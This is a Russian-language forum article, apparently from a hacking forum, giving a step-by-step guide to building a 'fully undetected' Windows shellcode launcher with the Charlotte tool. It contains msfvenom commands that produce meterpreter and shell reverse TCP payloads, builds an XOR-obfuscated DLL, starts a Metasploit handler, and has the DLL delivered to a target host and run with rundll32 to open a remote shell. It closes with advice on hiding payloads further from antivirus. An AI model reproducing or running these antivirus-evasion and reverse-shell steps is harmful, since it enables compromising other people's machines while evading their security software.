Что нового

Article FUD - Маскируем Shellcode под Windows

Vander 0

Vander

Команда форума
10.11.2019
487
1 125
Приветствую, уважаемую аудиторию форума.

create-undetectable-trojan-using-domain-name.1280x600.jpg

В этой статье разберем метод создания FUD шеллкода под Windows платформу.

Для начала, немного теории:
Для того, чтобы достичь максимального профита в данном впоросе и в данном конкретном случае мы будем использовать:

Charlotte - C++ Fully Undetected Shellcode Launcher

Description:
  • Средство запуска шелл-кода c ++, полностью необнаруженное 0/26 по состоянию на 13 мая 2021 г.
  • Динамический вызов функций api win32
  • XOR-шифрование шелл-кода и имен функций
  • Рандомизированные ключи XOR и переменные за запуск
  • Требования для Kali Linux просто «apt-get install mingw-w64 *»
  • Рандомизация длины случайных строк и ключей XOR
Приступаем к реализации задуманного:

Код:
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
Код:
cd charlotte
1622138582092.png

Код:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
1622138972811.png

Код:
python charlotte.py
1622139039022.png

Такой вывод, должен вас ждать в случае успешного создания dll файла для запуска его на целевом хосте.

Код:
rundll32 charlotte.dll, STmdDoaQ
1622139383410.png

STmdDoaQ -В данном случае выступает ключом, с которым мы позже запустим dll на целевом хосте.

Запускаем обработчик входящих подключений на атакующем хосте:

Код:
msfconsole
use exploit/multi/handler
set LHOST {IP}
set LPORT {port}
1622139972761.png

Доставляем файл charlotte.dll на целевой хост, и выполняем:

Код:
rundll32 charlotte.dll, STmdDoaQ
1622140714171.png

В результате, закономерно получаем шелл на целевом хосте:

1622140410478.png

В целом, всё выглядит неплохо, но если на борту у целевого хоста стоит антивирус, нормальный с последними обновлениями то мы получаем срабатывание на meterpreter, так как он не палится только ленивыми.

Попробуем немного видоизменить полезную нагрузку:

Код:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.101 LPORT=4444 -f raw > beacon.bin
1622144247524.png

Запускаем обработчик:

1622144331453.png

Данный тест проводился на Windows 10 с последними обновлениями и наличием антивирусного решения ESET, и как результат, ESET убил полезную нагрузку.

1622143822590.png

Вывод:
  • Метод и инструмент достаточно хорош, dll файл не распознается как вредоносный ни антивирусом ни Windows Defender
  • Использование стандартных полезных нагрузок не сработает, в случае наличия вменяемого антивирусного решения на целевом хосте
  • Нужно использовать отличные от предлагаемых стандартных методов сокрытия полезной нагрузки для достижения желаемого результата.
Спасибо за внимание, материал подготовлен специально для protey.net
 
Верх Низ